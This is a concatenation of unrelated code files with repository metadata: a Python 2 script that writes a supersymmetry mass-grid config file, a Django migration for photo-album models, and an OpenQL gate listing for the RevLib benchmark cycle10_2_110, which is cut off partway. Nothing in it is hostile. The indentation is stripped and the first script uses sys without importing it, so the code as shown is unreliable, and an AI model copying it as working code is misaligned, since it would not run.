import posix
import getopt, string
import re, random, math
import posix
import time
from stat import *
from glob import glob
if len(sys.argv) < 2: # the program name and one argument
# stop the program and print an error message
sys.exit("Must provide output file name!")
############################################################################################
### COMMON PARAMETER ######
# scan inputs:
ReportProgressOnceEvery_SLHAs = 1000
#NumPoints = 10000
CFILE=sys.argv[1]
GRIDtype=str(sys.argv[2]) #0=gl_neut, 1=sq_neut
Hmass=sys.argv[3] #positive value to change Higgs mass!
tanBeta=sys.argv[4] #tanBeta value
if GRIDtype=='0':
#* >>> gluino_neutralino grid
#v_M1 = [200,250,300,350,400,450,500,550,600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400,1450,1500]
#v_mu = [140,200,270,330,385,440,492,540,595,647,698,749,800,850,902,953,1004,1055,1105,1156,1207,1258,1310,1363,1414,1465,1520]
#v_M1 = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400]
#v_mu = [590,647,698,749,800,850,902,953,1004,1055,1105,1156,1207,1258,1310,1361,1412]
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
#v_M1 = [600,647,697,745,795,845,893,942,990,1040,1090,1140,1190,1238,1288]#,1338,1388]
#v_mu = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300]#,1350,1400]
##FINAL SETUP 2014 (RunI paper)
v_mu = [150,175,200,250,350,450,550,650,750,850,950,1050,1150,1250,1300,1350]
v_M1 = [300,270,267,288,365,456,551,647,745,845,942,1040,1140,1238,1288,1338]
v_M3 = [300,400,500,600,800,850,900,950,1000,1050,1100,1150,1200,1250,1300,1350,1400]
v_Msq = [2500]
elif GRIDtype=='1':
#* >>> sq_neutralino grid
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
v_M1 = [600,647,697,745,795,845,893,942,990,1040,1090,1140,1190,1238,1288]#,1338,1388]
v_mu = [600,650,700,750,800,850,900,950,1000,1050,1100,1150,1200,1250,1300]#,1350,1400]
v_M3 = [2500]
v_Msq = [800,850,900,950,1000,1050,1100,1150,1200,1250,1300]
elif GRIDtype=='2':
#* >>> EWK neutralino grid
#new setup as function of (regular) mu [04-04-2013] BR(chi10 -> Ggamma)~50%
v_M1 = [157,180,205,54,352,451,549,647,745,845,942,1040,1140,1238]
v_mu = [150,175,200,250,350,450,550,650,750,850,950,1050,1150,1250]
v_M3 = [2500]
v_Msq = [2500]
else:
sys.exit(0)
Minmu=400 # min f , mu = M1/f
Maxmu=1300 # max f , mu = M1/f
MinM1=400 # min f , mu = M1/f
MaxM1=1300 # max f , mu = M1/f
MinM1mu=0.98 # min f , mu = M1/f
MaxM1mu=1.0 # max f , mu = M1/f
v_At = [0] #At possible values
doGmassScan=False # Gravitino mass scan
minGmass=1E-10
maxGmass=1E-06
GmassPoints=1
stepGmass=(maxGmass-minGmass)/GmassPoints
useM1muRelation=False
useFixedMu=True
useMuPositive=True
vbos=False
#open config file
fo = open(CFILE, "wb")
################################################################################
# SUSY-HIT: generate SLHA files one by one
Progress = 0
for atv in v_At:
for imu in range(len(v_mu)):
for m3v in v_M3:
for msqv in v_Msq:
iGmv = 0
while iGmv < GmassPoints:
iGmv += 1
Progress += 1
M1 = v_M1[imu]
M3 = m3v
Msq = msqv
mu = v_mu[imu]
#make sure that the (aprox) M(chi10) is greater than M(gluino)
# if M1 >= M3:
if mu > M3:
continue
# if M1 >= Msq:
if mu > Msq:
continue
if useM1muRelation==True:
M1 = (mu * random.uniform(MinM1mu, MaxM1mu)) * ((-1) ** random.randint(0,1))
elif useFixedMu==True:
M1 = v_M1[imu]
else:
M1 = random.randint(MinM1, MaxM1) * ((-1) ** random.randint(0,1))
if useMuPositive==True:
mu = math.fabs(mu)
At = atv
if doGmassScan==True:
Gmass = minGmass + iGmv*stepGmass
else:
Gmass = -999
if (Progress % ReportProgressOnceEvery_SLHAs == 0):
print 'SUSY-HIT',Progress,'points'# through',GmassNumPoints
fo.write(str(M1)+' '+str(mu)+' '+str(M3)+' '+str(Msq)+' '+str(At)+' '+str(Gmass)+' '+str(iGmv)+' '+str(GRIDtype)+' '+str(Hmass)+' '+str(tanBeta)+' \n');
#end of loops
# Close config file
fo.close()
| [
"mtripiana@users.noreply.github.com"
] | mtripiana@users.noreply.github.com |
ed22cd98ccc5c3ab583769e5ced040437212592d | 3f97f0ba5351aae879cae3c6c073d64077ee96bd | /ch99/photo/migrations/0001_initial.py | 14effa898a4c93b21d9524971d9600907b03422d | [
"MIT"
] | permissive | dukuaris/django_web | 7b8e63d82718afc2a7aedd97ceed97f8aeab4040 | d6e8486999a8db8fc99c4b7dae0ddac402828c9d | refs/heads/master | 2023-01-07T09:02:06.316075 | 2020-01-28T06:46:27 | 2020-01-28T06:46:27 | 232,438,676 | 0 | 0 | MIT | 2022-12-27T15:36:34 | 2020-01-07T23:45:17 | HTML | UTF-8 | Python | false | false | 1,543 | py | # Generated by Django 2.2.2 on 2020-01-16 09:54
from django.db import migrations, models
import django.db.models.deletion
import photo.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, verbose_name='NAME')),
('description', models.CharField(blank=True, max_length=100, verbose_name='One Line Description')),
],
options={
'ordering': ('name',),
},
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, verbose_name='TITLE')),
('description', models.TextField(blank=True, verbose_name='Photo Description')),
('image', photo.fields.ThumbnailImageField(upload_to='photo/%Y/%m', verbose_name='IMAGE')),
('upload_dt', models.DateTimeField(auto_now_add=True, verbose_name='UPLOAD DATE')),
('album', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='photo.Album')),
],
options={
'ordering': ('title',),
},
),
]
| [
"dukuaris@gmail.com"
] | dukuaris@gmail.com |
073c3efb2dc0e05f5668c065c6a14749d6d65f4c | 0e25dc15ae9efce8bfd716d4d2041da07767968b | /qbench/benchmarks/RevLib/OPENQL_converted/cycle10_2_110.py | 38015650e921d4e45307087e364e05df9a9bb531 | [] | no_license | alxhotel/crossbar-bench | f608fc0062b4f8a5162ec33d61c0204aaf27b6ff | 3bf7536e7697d29c3089b0ba564ba22d39698b88 | refs/heads/master | 2021-07-13T16:06:50.085838 | 2020-10-04T23:39:05 | 2020-10-04T23:39:05 | 213,409,122 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143,382 | py | from openql import openql as ql
import os
import argparse
def circuit(config_file, new_scheduler='yes', scheduler='ASAP', uniform_sched= 'no', sched_commute = 'yes', mapper='base', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='test_output', optimize='no', measurement=True, log_level='LOG_WARNING'):
curdir = os.path.dirname(__file__)
output_dir = os.path.join(curdir, output_dir_name)
ql.set_option('output_dir', output_dir)
ql.set_option('optimize', optimize)
ql.set_option('scheduler', scheduler)
ql.set_option('scheduler_uniform', uniform_sched)
ql.set_option('mapper', mapper)
ql.set_option('initialplace', initial_placement)
ql.set_option('log_level', log_level)
ql.set_option('scheduler_post179', new_scheduler)
ql.set_option('scheduler_commute', sched_commute)
ql.set_option('mapusemoves', moves)
ql.set_option('maptiebreak', maptiebreak)
config_fn = os.path.join(curdir, config_file)
# platform = ql.Platform('platform_none', config_fn)
platform = ql.Platform('starmon', config_fn)
sweep_points = [1,2]
num_circuits = 1
num_qubits = 12
p = ql.Program('cycle10_2_110', platform, num_qubits)
p.set_sweep_points(sweep_points, num_circuits)
k = ql.Kernel('cycle10_2_110', platform, num_qubits)
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
